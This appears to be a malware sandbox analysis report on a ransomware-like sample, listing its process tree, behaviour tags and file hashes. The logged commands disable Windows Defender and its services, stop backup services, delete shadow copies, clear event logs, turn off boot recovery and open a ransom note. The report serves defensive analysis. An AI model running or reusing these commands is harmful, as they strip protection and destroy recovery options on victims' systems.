  PID 944 wrote to memory of 1012 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | net.exe
  PID 1012 wrote to memory of 1624 | 1012 | net.exe | net1.exe
  PID 1012 wrote to memory of 1624 | 1012 | net.exe | net1.exe
  PID 1012 wrote to memory of 1624 | 1012 | net.exe | net1.exe
  PID 944 wrote to memory of 864 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 864 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 864 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 1892 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 1892 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 1892 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 1736 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 1736 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 1736 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 2040 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 2040 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 2040 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 1304 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 1304 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 1304 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
  PID 944 wrote to memory of 1744 | 944 | 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | sc.exe
Processes
C:\Users\Admin\AppData\Local\Temp\4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe | "C:\Users\Admin\AppData\Local\Temp\4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe" | PID:944
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe | net.exe stop "NetMsmqActivator" /y | PID:576
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "NetMsmqActivator" /y | PID:776
  C:\Windows\system32\net.exe | net.exe stop "SamSs" /y | PID:1300
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y | PID:992
  C:\Windows\system32\net.exe | net.exe stop "SDRSVC" /y | PID:640
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y | PID:1196
  C:\Windows\system32\net.exe | net.exe stop "SstpSvc" /y | PID:1996
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y | PID:408
  C:\Windows\system32\net.exe | net.exe stop "UI0Detect" /y | PID:2020
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y | PID:1432
  C:\Windows\system32\net.exe | net.exe stop "VSS" /y | PID:1252
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "VSS" /y | PID:1876
  C:\Windows\system32\net.exe | net.exe stop "wbengine" /y | PID:1068
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y | PID:1916
  C:\Windows\system32\net.exe | net.exe stop "WebClient" /y | PID:1012
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y | PID:1624
  C:\Windows\system32\sc.exe | sc.exe config "NetMsmqActivator" start= disabled | PID:864
  C:\Windows\system32\sc.exe | sc.exe config "SamSs" start= disabled | PID:1892
  C:\Windows\system32\sc.exe | sc.exe config "SDRSVC" start= disabled | PID:1736
  C:\Windows\system32\sc.exe | sc.exe config "SstpSvc" start= disabled | PID:2040
  C:\Windows\system32\sc.exe | sc.exe config "UI0Detect" start= disabled | PID:1304
  C:\Windows\system32\sc.exe | sc.exe config "VSS" start= disabled | PID:1744
  C:\Windows\system32\sc.exe | sc.exe config "wbengine" start= disabled | PID:920
  C:\Windows\system32\sc.exe | sc.exe config "WebClient" start= disabled | PID:1592
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f | PID:752
  C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | PID:1716
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | PID:776
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | PID:904
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | PID:1764
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | PID:1772
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | PID:636
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | PID:1432
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | PID:800
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f | PID:968
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f | PID:1180
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f | PID:1948
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f | PID:1700
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f | PID:1392
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f | PID:1504
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f | PID:1412
  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable | PID:1156
  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable | PID:1548
  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable | PID:676
  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable | PID:688
  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable | PID:1964
  C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f | PID:1256
  C:\Windows\system32\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f | PID:1528
  C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f | PID:964
  C:\Windows\system32\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f | PID:1624
  C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f | PID:1116
  C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f | PID:832
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f | PID:1740
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f | PID:1944
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f | PID:1588
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f | PID:1224
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- Modifies security service
PID:408 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:916
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1768 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1120 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1696 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:936 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1028
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:320 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1904 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124 -
C:\Windows\system32\notepad.exenotepad.exe C:\wPfq_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2504 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe"2⤵PID:2512
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2536
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: f48421645e65afafe8ff3a051e18ee81
  SHA1: 0be58da0cdd48862918da5a8130e1badea773bc8
  SHA256: e255771c63499b3941fdb19d178bcd797a41fb3d8718e8a54aa8db9c381d3f7c
  SHA512: 17275cd960d7351f237ea8451cece942c3b3b384b995aaa950692f579a677ffc6128c21b4f616cd53a5e2f5ffd418815c59a2da251daeff25a26ca52f1ad0baa
-
  MD5: 3d3aab4fac96343c7e4bf9f111f89193
  SHA1: 550d2ea76bb0a789e4bfbefef4a899c4fbad254c
  SHA256: 54643189ee659f0e200ac4eb1ae678f35c016e0905eca63e675dbeadfc2422d8
  SHA512: 15b065276f0f8acd76c54462a6f71153e0df65a10aff76412bf2582940b46ff64124e2577e320220aa9c0daf1e4d3f5fc5d4d78aee5979e60a10690a702badda